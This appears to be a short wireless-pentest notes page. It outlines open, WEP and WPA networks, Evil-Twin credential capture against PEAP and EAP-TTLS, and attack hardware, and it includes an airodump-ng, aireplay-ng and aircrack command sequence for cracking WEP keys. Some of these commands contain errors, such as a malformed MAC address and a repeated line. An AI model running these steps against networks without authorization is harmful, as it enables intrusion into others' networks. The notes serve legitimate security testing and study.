Wireless pentest

Open network

  • Usually for guest access and only for internet

  • The guest can access it directly or they need to authenticate through a portal

WEP

  • This protocol has been completely broken for many years and should not be used anymore.

  • We can find the key very easily

# Capture around 30 000 IV (maybe more)
airodump-ng -c 11 --bssid 60:A4:4C:20:DF:60 -w [OUTPUTFILENAME] wlan0mon
# Generate ARP traffic
aireplay-ng -3 -b 00::09:58:6F:64:1E -h 44:60:57:c8:58:A0 wlan0mon
# Monitor the number of IV with
Aircrack out.cap
# Break the key
Aircrack out.cap

WPA

  • 2 authentication modes :

    • Personal = WPA PSK (Pre-Shared Key) = authentification by a secret shared with everyone (like at home)

    • Enterprise = WPA MGT (Management) = EAP (Extensible Authentication Protocol). It is possible to use several different EAP methods (see the official list on the IANA website) but here are the most common versions:

      • PEAP : historically the only protocol supported by Windows, transmits the credentials of the AD via an MSCHAPv2, thus allowing to recover a NetNTLMv2 hash through the Evil-Twin attack.

      • EAP-TTLS : very similar, can authenticate via login/password which can be recovered via the Evil-Twin attack if the clients do not check the certifcat of the access point.

      • EAP-TLS : mutual authentication by certificate.

The Hacking process

image

Source: Practical Ethical Hacking - TCM Security

OR

Tools

Equipment

  • The following are equipment that can be used for wifi pentest

    • Wireless card Alfa AWUD036NH

    • Alfa AWUS1900

    • Alfa AWUS036ACH

    • Alfa AWUS052NH

    • Alfa AWUS051NH

    • Alfa AWUS036NHR

    • TP-Link TL-WN722N

    • Hak5 Pineapple Nano Basic

    • Flipper Zero along with the wifi dev board

Resources

Wireless pentest checklist
PWNING WPA/WPA2 NETWORKS WITH BETTERCAP AND THE PMKID CLIENT-LESS ATTACK - on evilsocket
How to Crack WPA/WPA2
WirelesSHack
Practical Ethical Hacking - TCM Security

Last updated